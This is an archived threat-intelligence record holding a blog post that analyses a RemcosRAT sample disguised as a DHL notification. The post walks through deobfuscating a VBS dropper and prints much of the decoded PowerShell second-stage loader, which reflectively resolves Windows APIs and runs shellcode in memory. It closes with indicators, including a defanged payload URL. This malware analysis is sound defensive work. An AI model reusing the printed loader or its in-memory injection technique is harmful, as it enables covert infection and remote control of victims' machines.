{
	"id": "42410b8b-445c-43f5-a007-a6fdbef05016",
	"created_at": "2026-04-06T00:06:14.493372Z",
	"updated_at": "2026-04-10T03:21:53.411422Z",
	"deleted_at": null,
	"sha1_hash": "ee04a56a3397bdaa9dd5ca1db88382427d598353",
	"title": "Malware Analysis - RemcosRAT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1720747,
	"plain_text": "Malware Analysis - RemcosRAT\r\nBy Bar Magnezi\r\nPublished: 2024-05-30 · Archived: 2026-04-05 13:03:51 UTC\r\n4 minute read\r\nSample:\r\n5a4ef048a5e3b38a1cfe3813955c1770\r\nBackgroundPermalink\r\nRemcos RAT (Remote Control and Surveillance) is a malware tool used for remote control of infected computers,\r\ntypically distributed via phishing emails, malicious attachments, or compromised websites. It allows attackers to\r\ncapture keystrokes, take screenshots, record audio, steal passwords, manage files and manipulate processes and\r\nservices.\r\nStatic AnalysisPermalink\r\nFigure 1: Malware Bazaar Entry\r\nhttps://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/\r\nPage 1 of 9\n\nThis sample was uploaded to Malware Bazaar, impersonating a DHL delivery notification.\r\nFigure 2: Obfuscated VBS\r\nFigure 3: Second part of the VBS\r\nWe can already see strings related to PowerShell, as marked in Figures 2 and 3. I decided to clean the code a bit to\r\nmake it more readable.\r\nhttps://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/\r\nPage 2 of 9\n\nFigure 4: Cleaned VBS\r\nAs marked in Figure 4, this function is being called on almost every variable. Basically, what this function does is\r\ntake a large string and extract every 5th character to build a new string.\r\nFigure 5: Building Regex in CyberChef\r\nAfter iterating over every variable and decoding it, we got the following output:\r\nhttps://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/\r\nPage 3 of 9\n\nFigure 6: Deobfuscated VBS\r\nAs marked in Figure 6, we can see a URL and a specific byte location from which it reads and performs further\r\nmanipulation.\r\nSecond StagePermalink\r\nIn order to obtain the second stage of the malware, I needed to browse to this URL, which output a large string.\r\nFigure 7: Seeing The content of the URL\r\nI used CyberChef to base64-decode this file and went to the specific location marked in Figure 6. This revealed\r\nthe actual second-stage malware.\r\nhttps://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/\r\nPage 4 of 9\n\nFigure 8: Base64-decode\r\nCopying the entire code to a new file revealed that it uses the same function (Regex) as before and a new encoding\r\nmethod.\r\nFigure 9: Using the Same Regex\r\nhttps://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/\r\nPage 5 of 9\n\nFigure 10: Using new encoding method\r\nAfter further analysis, I discovered that this new encoding method uses XOR with 17 in Hex as the key to decode\r\nthe string, as shown in Figure 11.\r\nFigure 11: Using CyberChef to decode\r\nhttps://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/\r\nPage 6 of 9\n\nFigure 12: Decoding of every XOR encoded\r\nVBS After Decoding \u0026 CleaningPermalink\r\n$Woadman='\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe '\r\n$Hogg='powershell.exe '\r\n$Skamfilendes ='exit '\r\nSmedemestres ('$global:Recants=$env:windir + $Woadman ')\r\nSmedemestres ('$global:Desinficeringsmidlerne = ((gwmi win32_process -F ProcessId=${PID}).CommandLine) -split [c\r\nSmedemestres ('$global:gammoned = $Desinficeringsmidlerne[$Desinficeringsmidlerne.count-2] ')\r\nSmedemestres ('$global:Forbigangen = ([IntPtr]::size -eq 8) ')\r\nSmedemestres ('if (!$Forbigangen){ $global:Recants = $Hogg} ')\r\nSmedemestres ('$global:Turboladedes=($Understimuleret -or $Forbigangen) ')\r\nif($Turboladedes){\r\n\u0026$Recants $gammoned\r\nSmedemestres $Skamfilendes\r\n}\r\nfunction Skinproblemer136 ($Gutsily,$Mdeaftalerne) {\r\nSmedemestres ('$Gutsily -bxor $Mdeaftalerne ')\r\n}\r\nFunction Irvings27 ($vagtposten, $Herpetolog = 0){\r\nSmedemestres ('$global:Blomsterkoste = New-Object byte[] ($vagtposten.Length / 2) $global:Blomsterkoste = New-Ob\r\nFor($Milvine=0; $Milvine -lt $vagtposten.Length; $Milvine+=2){\r\nSmedemestres ('$Blomsterkoste[$Milvine/2] = [convert]::ToByte($vagtposten.Substring($Milvine, 2), 16) ')\r\n$Blomsterkoste[$Milvine/2] = Skinproblemer136 $Blomsterkoste[$Milvine/2] 23\r\n}\r\nSmedemestres ('$global:Pigeonholes=[String][System.Text.Encoding]::ASCII.GetString($Blomsterkoste) ')\r\nif ($Herpetolog) {\r\nhttps://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/\r\nPage 7 of 9\n\nSmedemestres $Pigeonholes\r\n}else {\r\n$Pigeonholes\r\n}\r\n}\r\n$Revisionen=Irvings27 'System.dll'\r\n$Miniatureformaters=Irvings27 'Microsoft.Win32.UnsafeNativeMethods'\r\n$Ekskursionens=Irvings27 'GetProcAddress'\r\n$Masterstroke=Irvings27 'System.Runtime.InteropServices.HandleRef'\r\n$Nationalistiske=Irvings27 'string'\r\n$Waling89=Irvings27 'GetModuleHandle'\r\n$Lige=Irvings27 'RTSpecialName, HideBySig, Public'\r\n$Coelanaglyphic=Irvings27 'Runtime, Managed'\r\n$Zorn=Irvings27 'ReflectedDelegate'\r\n$Fljtespillernes=Irvings27 'InMemoryModule'\r\n$requital=Irvings27 'MyDelegateType'\r\n$Mancipate=Irvings27 'Class, Public, Sealed, AnsiClass, AutoClass'\r\n$Paritetsbit=Irvings27 'Invoke'\r\n$Intenible=Irvings27 'Public, HideBySig, NewSlot, Virtual'\r\n$Lanolated=Irvings27 'VirtualAlloc'\r\n$Konfererende=Irvings27 'ntdll'\r\n$Premeasure=Irvings27 'NtProtectVirtualMemory'\r\n$Postantennal=Irvings27 '\\'\r\n$Squalidness=Irvings27 'USER32'\r\n$Froprdiken=Irvings27 'CallWindowProcA'\r\n$dermatopathophobia = Irvings27 'kernel32'\r\n$Gaveafgifters = Irvings27 'user32'\r\n$Muschelkalk=Irvings27 'ShowWindow'\r\nfunction Platinamine ($Ravishments, $Byrindets)\r\n{\r\nIrvings27 '$global:Datareduktionsfordelens = [AppDomain]::CurrentDomain.GetAssemblies()' 1\r\nIrvings27 '$global:Forpagtningsforhold = ($Datareduktionsfordelens | Where-Object { $_.GlobalAssemblyCa\r\nIrvings27 '$global:Firesafe = $Forpagtningsforhold.GetMethod($Ekskursionens, [Type[]] @($Masterstroke,\r\nIrvings27 'return $Firesafe.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object Syste\r\n}\r\nfunction Taenkte ([Parameter(Position = 0)] [Type[]] $Nominations,[Parameter(Position = 1)] [Type] $Baggrundslag\r\n{\r\n \r\nIrvings27 '$global:Bagvasker = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Refl\r\n$Nuklearmedicin85=33344-33343\r\nIrvings27 '$Bagvasker.DefineConstructor($Lige, $Nuklearmedicin85, $Nominations).SetImplementationFlags(\r\nIrvings27 '$Bagvasker.DefineMethod($Paritetsbit, $Intenible, $Baggrundslager, $Nominations).SetImplemen\r\nIrvings27 'return $Bagvasker.CreateType()' 1\r\n}\r\n$Indvendendes=0\r\nIrvings27 '$global:Headroom = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((Platinami\r\nIrvings27 '$global:Rhema = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((Platinamine\r\nhttps://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/\r\nPage 8 of 9\n\n$Holloa = 'Varigheder'\r\nIrvings27 '${Host}.UI.RawUI.WindowTitle = $Holloa' 1\r\nIrvings27 '$global:Niches = (Get-Process | Where-Object { $_.MainWindowTitle -eq $Holloa })' 1\r\nIrvings27 '$global:Backsliding = $Niches.MainWindowHandle' 1\r\nIrvings27 '$Rhema.Invoke($Backsliding, $Indvendendes)' 1\r\n$Nonmethodically = Platinamine $Konfererende $Premeasure\r\n$GutsilyllocType=-13794+26082\r\n$GutsilyllocProt=-50897+50961\r\n$Gutsilyllocrw=-28683+28687\r\nIrvings27 '$global:Resultaterne = $Headroom.Invoke($Indvendendes, 655, $GutsilyllocType, $GutsilyllocProt)' 1\r\nIrvings27 '$global:Arbejdsbyrder = $Headroom.Invoke($Indvendendes, 26640384, $GutsilyllocType, $Gutsilyllocrw)'\r\nIrvings27 '[System.Runtime.InteropServices.Marshal]::Copy($Okkuperingers, $Indvendendes, $Resultaterne, 655)' 1\r\n$Divergence=284535-655\r\nIrvings27 '[System.Runtime.InteropServices.Marshal]::Copy($Okkuperingers, 655, $Arbejdsbyrder, $Divergence)' 1\r\nIrvings27 '$global:Erobringstogt = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((Plat\r\nIrvings27 '$Erobringstogt.Invoke($Resultaterne,$Arbejdsbyrder,$Nonmethodically,$Indvendendes,$Indvendendes)' 1\r\nIOCsPermalink\r\nHash:\r\n5a4ef048a5e3b38a1cfe3813955c1770\r\nURL\r\nshereihnao[.]ru[.]com\r\nhxxp://shereihnao[.]ru[.]com/Bededagsferier[.]hhk\r\nSource: https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/\r\nhttps://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/"
	],
	"report_names": [
		"RemcosRAT"
	],
	"threat_actors": [],
	"ts_created_at": 1775433974,
	"ts_updated_at": 1775791313,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ee04a56a3397bdaa9dd5ca1db88382427d598353.pdf",
		"text": "https://archive.orkl.eu/ee04a56a3397bdaa9dd5ca1db88382427d598353.txt",
		"img": "https://archive.orkl.eu/ee04a56a3397bdaa9dd5ca1db88382427d598353.jpg"
	}
}